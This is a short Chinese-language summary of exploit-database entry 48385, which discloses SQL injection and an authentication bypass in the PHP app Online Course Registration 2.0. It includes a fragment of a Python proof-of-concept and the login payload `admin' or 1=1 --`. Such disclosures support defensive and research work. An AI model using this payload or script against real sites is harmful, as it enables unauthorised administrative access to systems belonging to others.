关键信息 漏洞名称: Online Course Registration 2.0 - Authentication Bypass 漏洞ID: 48385 作者: Daniel Monzón (stark0de) 类型: Webapps 平台: PHP 日期: 2020-04-27 漏洞应用: Online Course Registration 2.0 测试环境: Kali Linux x64 5.4.0 漏洞详情 SQL注入: 多个SQL注入漏洞存在于在线课程注册PHP脚本中。 身份验证绕过: 可以通过两个登录页面绕过身份验证。 漏洞利用代码: 提供了Python脚本用于验证身份验证绕过漏洞。 ```python try: req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True) resp_code = req.status_code if resp_code == 200 and "document.chngpwd.cpass.value" in req.text: print(symbol_green+" Authentication bypassed for admin user!\n") print(symbol_green+" To test this manually, visit: "+adminurl+" and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")